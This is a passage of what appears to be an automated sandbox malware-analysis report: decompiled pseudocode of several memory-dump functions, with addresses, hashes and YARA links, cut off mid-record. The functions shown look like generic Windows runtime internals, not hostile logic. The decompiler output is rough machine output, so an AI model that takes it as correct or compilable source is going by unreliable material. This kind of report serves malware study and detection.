                          0x048abc94
                          0x048abcbd
                          0x048abcca
                          0x048abccb
                          0x048abccc
                          0x048abccd
                          0x048abcce
                          0x048abcd4
                          0x048abcea
                          0x048abcee
                          0x048abcf2
                          0x048abd00
                          0x048abd04
                          0x00000000
                          0x048abc96
                          0x048abcab
                          0x048abcaf
                          0x048abd2c
                          0x048abd2c
                          0x048abd09
                          0x00000000
                          0x048abd09
                          0x048abcb1
                          0x048abcb5
                          0x048abcbb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x048abcbb

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 924793e0e3004dd3380bc92583bd285aa00f90644e998165e4bd69ef24e33cf5
                          • Instruction ID: 787518a1f8e184dd16a2b5d20b7ccfae200d443f307be3af5414cdced2307ec6
                          • Opcode Fuzzy Hash: 924793e0e3004dd3380bc92583bd285aa00f90644e998165e4bd69ef24e33cf5
                          • Instruction Fuzzy Hash: 77310E32A04605DBEB01DF99C480BA677A4EF18314F050A78EE05EB201EBB8FD158BC0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048A1DB5, Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          C-Code - Quality: 60%
                          			E048A1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0489F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L04894620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0489F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                          0x048a1dc2
                          0x048a1dc5
                          0x048a1dc7
                          0x048a1dcc
                          0x048a1dce
                          0x048a1dd6
                          0x048a1ddf
                          0x048a1de0
                          0x048a1de1
                          0x048a1de5
                          0x048a1de8
                          0x048a1def
                          0x048a1df0
                          0x048a1df6
                          0x048a1df7
                          0x048a1dfe
                          0x048a1e1a
                          0x00000000
                          0x00000000
                          0x048a1e0b
                          0x048a1e12
                          0x048a1e12
                          0x048a1e00
                          0x048a1e00
                          0x048a1e05
                          0x048a1e1e
                          0x048a1e23
                          0x048e570f
                          0x048e5713
                          0x00000000
                          0x00000000
                          0x048e5719
                          0x048e5719
                          0x048a1e2c
                          0x048a1e2d
                          0x048a1e2e
                          0x048a1e2f
                          0x048a1e31
                          0x048a1e32
                          0x048a1e35
                          0x048a1e3d
                          0x048e5723
                          0x048e573d
                          0x048e573d
                          0x00000000
                          0x048e5723
                          0x048a1e49
                          0x048a1e4e
                          0x048a1e4e
                          0x048a1e09
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                          • Instruction ID: 9d866d2e2cffd7a3eeef27de5e6f1310beaf87c4f28ec887ae21765ff799b181
                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                          • Instruction Fuzzy Hash: 5B21B171A40108FFE720CF99CC84E6ABBB9EF85B44F144A55E501D7210DA74BD21C7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04879100, Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E04879100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x494f6e8);
				E048CD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E049488F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E048CD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x49686c0; // 0x6907b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x49686b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E04892280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E049488F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E048BAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x496b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x49684c0;
										if(_t69 >=  *0x49684c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E04949063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0487922A(_t82);
							_t53 = E04897D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E04948B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x49686c0; // 0x6907b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x49686b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x49686bc;
										_t72 = 0x49686b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E04879240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x49686c4;
									_t72 = 0x49686c0;
									L18:
									E048A9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                          0x04879100
                          0x04879100
                          0x04879100
                          0x04879100
                          0x04879102
                          0x04879107
                          0x0487910c
                          0x04879110
                          0x04879115
                          0x04879136
                          0x04879143
                          0x048d37e4
                          0x048d37e4
                          0x04879149
                          0x0487914e
                          0x0487914e
                          0x04879117
                          0x0487911d
                          0x00000000
                          0x00000000
                          0x0487911f
                          0x04879125
                          0x00000000
                          0x04879151
                          0x04879158
                          0x0487915d
                          0x04879161
                          0x04879168
                          0x048d3715
                          0x00000000
                          0x0487916e
                          0x0487916e
                          0x04879175
                          0x04879177
                          0x0487917e
                          0x0487917f
                          0x04879182
                          0x04879182
                          0x04879187
                          0x04879187
                          0x0487918a
                          0x0487918d
                          0x0487918f
                          0x04879192
                          0x04879195
                          0x04879198
                          0x04879198
                          0x04879198
                          0x0487919a
                          0x00000000
                          0x00000000
                          0x048d371f
                          0x048d3721
                          0x048d3727
                          0x048d372f
                          0x048d3733
                          0x048d3735
                          0x048d3738
                          0x048d373b
                          0x048d373d
                          0x048d3740
                          0x00000000
                          0x00000000
                          0x048d3746
                          0x048d3749
                          0x00000000
                          0x00000000
                          0x048d374f
                          0x048d3751
                          0x00000000
                          0x00000000
                          0x048d3757
                          0x048d3759
                          0x048d375c
                          0x048d375c
                          0x048d375e
                          0x048d375e
                          0x048d3761
                          0x048d3764
                          0x00000000
                          0x00000000
                          0x048d3766
                          0x048d3768
                          0x048d37a3
                          0x048d37a3
                          0x048d37a5
                          0x048d37a7
                          0x048d37ad
                          0x048d37b0
                          0x048d37b2
                          0x048d37bc
                          0x048d37c2
                          0x048d37c2
                          0x048d37b2
                          0x04879187
                          0x04879187
                          0x0487918a
                          0x0487918d
                          0x0487918f
                          0x04879192
                          0x04879195
                          0x00000000
                          0x04879195
                          0x00000000
                          0x04879187
                          0x048d376a
                          0x048d376a
                          0x048d376c
                          0x048d376c
                          0x048d376f
                          0x048d3775
                          0x00000000
                          0x00000000
                          0x048d3777
                          0x048d3779
                          0x00000000
                          0x00000000
                          0x048d3782
                          0x048d3787
                          0x048d3789
                          0x048d3790
                          0x048d3790
                          0x048d378b
                          0x048d378b
                          0x048d378b
                          0x048d3792
                          0x048d3795
                          0x048d3795
                          0x048d3798
                          0x048d3798
                          0x048d379b
                          0x048d379b
                          0x048791a3
                          0x048791a9
                          0x048791b0
                          0x048791b4
                          0x048791b4
                          0x048791bb
                          0x048791c0
                          0x048791c5
                          0x048791c7
                          0x048d37da
                          0x048791cd
                          0x048791cd
                          0x048791cd
                          0x048791d2
                          0x048791d5
                          0x04879239
                          0x04879239
                          0x048791d7
                          0x048791db
                          0x048791e1
                          0x048791e7
                          0x048791fd
                          0x04879203
                          0x0487921e
                          0x04879223
                          0x00000000
                          0x04879223
                          0x04879205
                          0x04879208
                          0x0487920c
                          0x04879214
                          0x04879214
                          0x048791e9
                          0x048791e9
                          0x048791ee
                          0x048791f3
                          0x048791f3
                          0x048791f3
                          0x048791e7
                          0x00000000
                          0x048791db
                          0x04879187
                          0x04879168

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8816ff7608d6c84cf7244ef6f5cb7b23bbfc6c193ccb6c9c2f28fa9063e99889
                          • Instruction ID: ca08cc03f802288112adae7424cbfe66be30fed46d1422ee04ee973cebd8ac0b
                          • Opcode Fuzzy Hash: 8816ff7608d6c84cf7244ef6f5cb7b23bbfc6c193ccb6c9c2f28fa9063e99889
                          • Instruction Fuzzy Hash: 8831B5B5A05645DFFB21EF68C058B9CBBF1BB84358F148A69C414A7250C378F990C762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 04890050, Relevance: .1, Instructions: 81COMMON
                          Download Yara Rule
                          C-Code - Quality: 53%
                          			E04890050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x496d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E048A9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E048BB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04948A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E048A9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x496b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                          0x04890055
                          0x0489005d
                          0x04890062
                          0x0489006c
                          0x0489006f
                          0x04890074
                          0x0489007a
                          0x0489007a
                          0x04890080
                          0x04890080
                          0x04890087
                          0x0489008d
                          0x0489008f
                          0x04890093
                          0x04890095
                          0x0489009b
                          0x048900f8
                          0x048900fb
                          0x048900fc
                          0x048900ff
                          0x04890108
                          0x04890108
                          0x048900a2
                          0x048900a6
                          0x048900b3
                          0x048900bc
                          0x048900c5
                          0x048900ca
                          0x048dc01e
                          0x00000000
                          0x00000000
                          0x048dc02d
                          0x048900d5
                          0x048900d9
                          0x048dc03d
                          0x048dc046
                          0x048dc046
                          0x048900df
                          0x048900e2
                          0x048900ea
                          0x048900ef
                          0x048900f2
                          0x048900f6
                          0x04890111
                          0x04890117
                          0x04890117
                          0x00000000
                          0x048900f6
                          0x048900d0
                          0x048900d0
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bef2954d5bd4c92d450ffec6fd4ef0f7fcaf23c732bb02256ff56077d4135cf1
                          • Instruction ID: efd41684506692e688a045543effc488fbeeb626d6e7ccd266e1c96435e840ff
                          • Opcode Fuzzy Hash: bef2954d5bd4c92d450ffec6fd4ef0f7fcaf23c732bb02256ff56077d4135cf1
                          • Instruction Fuzzy Hash: 20316931601B04DFDB25DF28C940B9AB3E5FB89718F184A6DE596C7A90EB75BC01CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048F6C0A, Relevance: .1, Instructions: 79COMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E048F6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04897D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4967b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04894620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E048BF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04897D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E048B9AE0();
						_t23 = L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                          0x048f6c0a
                          0x048f6c0f
                          0x048f6c10
                          0x048f6c13
                          0x048f6c15
                          0x048f6c19
                          0x048f6c1c
                          0x048f6c21
                          0x048f6c28
                          0x048f6c3a
                          0x048f6c2a
                          0x048f6c33
                          0x048f6c33
                          0x048f6c3f
                          0x048f6c48
                          0x048f6c4d
                          0x048f6c60
                          0x048f6c65
                          0x048f6c69
                          0x048f6c73
                          0x048f6c79
                          0x048f6c7f
                          0x048f6c86
                          0x048f6c90
                          0x048f6c94
                          0x048f6ca6
                          0x048f6cb2
                          0x048f6cbd
                          0x048f6cbd
                          0x048f6cc3
                          0x048f6cc7
                          0x048f6ccb
                          0x048f6cd0
                          0x048f6cd1
                          0x048f6ce2
                          0x048f6ce2
                          0x048f6c69
                          0x048f6ced

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b9e85682fe69dc87e0d17f9b6a19c3bc16b01558683b3c2a0bbfc6e8d3b5689
                          • Instruction ID: 2d67e86087b708d78be4f32eceeca52dee6a103bbce31158a940b94a3a0f9b45
                          • Opcode Fuzzy Hash: 2b9e85682fe69dc87e0d17f9b6a19c3bc16b01558683b3c2a0bbfc6e8d3b5689
                          • Instruction Fuzzy Hash: 1521ABB1A00A44AFD711DB6CD880E6AB7B8FF48704F18066AFA44D7790E634ED11CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048B90AF, Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E048B90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E048CD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E048AE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04894620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E048BF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E048AA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                          0x048b90af
                          0x048b90b8
                          0x048b90bb
                          0x048b90bf
                          0x048b90c2
                          0x048b90c2
                          0x048b90c8
                          0x048b90cb
                          0x048b90cd
                          0x048f14d7
                          0x048f14eb
                          0x048f14eb
                          0x00000000
                          0x048f14eb
                          0x048f14db
                          0x048f14e6
                          0x00000000
                          0x048f14f2
                          0x048f14e8
                          0x00000000
                          0x048f14e8
                          0x048b90d8
                          0x048b90da
                          0x048b90dd
                          0x048b90e5
                          0x00000000
                          0x048b9139
                          0x048b90fa
                          0x048b90fe
                          0x048b9142
                          0x00000000
                          0x048b9142
                          0x048b9104
                          0x048b9107
                          0x048b910b
                          0x048b9110
                          0x048b9118
                          0x048b9147
                          0x048b9148
                          0x048b914f
                          0x048b9150
                          0x048b9151
                          0x048b9152
                          0x048b9156
                          0x048b915d
                          0x048b9160
                          0x048b9168
                          0x048b916c
                          0x048b91bc
                          0x048b91be
                          0x00000000
                          0x048b91be
                          0x048b916e
                          0x048b9173
                          0x048b9176
                          0x00000000
                          0x00000000
                          0x048b917c
                          0x048b9180
                          0x048b91b5
                          0x00000000
                          0x048b91b5
                          0x048b9182
                          0x048b9185
                          0x048b9189
                          0x00000000
                          0x00000000
                          0x048b918e
                          0x048b9190
                          0x048b9198
                          0x00000000
                          0x00000000
                          0x048b91a0
                          0x00000000
                          0x048b91ad
                          0x048b91ad
                          0x048b91b0
                          0x048b91b1
                          0x00000000
                          0x048b9185
                          0x048b911a
                          0x048b911c
                          0x048b911f
                          0x048b9125
                          0x048b9127
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                          • Instruction ID: 7882c0322cb6b9c8c4048bb9e16337d4944fd0846f5e7bf0a9d8619820583b93
                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                          • Instruction Fuzzy Hash: 722171B1A40209EFDB20DF59C844AAAB7F8EB54314F148D6AEA89D7300D274FD409B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 048A3B7A, Relevance: .1, Instructions: 75COMMON
                          Download Yara Rule
                          C-Code - Quality: 59%
                          			E048A3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x49684c4; // 0x0
				_v12 = 1;
				_v8 =  *0x49684c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04894620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x49684c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E048BAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E048BFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x49684c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x49684c4; // 0x0
					L048977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                          0x048a3b89
                          0x048a3b96
                          0x048a3ba1
                          0x048a3bab
                          0x048a3bb5
                          0x048a3bb9
                          0x048e6298
                          0x048a3bbf
                          0x048a3bc2
                          0x048a3bc3
                          0x048a3bc9
                          0x048a3bca
                          0x048a3bcc
                          0x048a3bcd
                          0x048a3bd4
                          0x048a3bd6
                          0x048a3bdb
                          0x048a3bea
                          0x048a3bf7
                          0x048a3bfb
                          0x048a3bff
                          0x048a3c09
                          0x048a3c0a
                          0x048a3c0b
                          0x048a3c0f
                          0x048a3c14
                          0x048a3c18
                          0x048a3c18
                          0x048a3bfb
                          0x048a3c1b
                          0x048a3c30
                          0x048a3c30
                          0x048a3c3d

                          Memory Dump Source
                          • Source File: 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp, Offset: 04850000, based on PE: true
                          • Associated: 00000008.00000002.937561044.000000000496B000.00000040.00000001.sdmp Download File
                          • Associated: 00000008.00000002.937575334.000000000496F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ecdbdca7c33dd51eb5a495f551eace924b7b67f236f40c2416265dc8ab08ad69
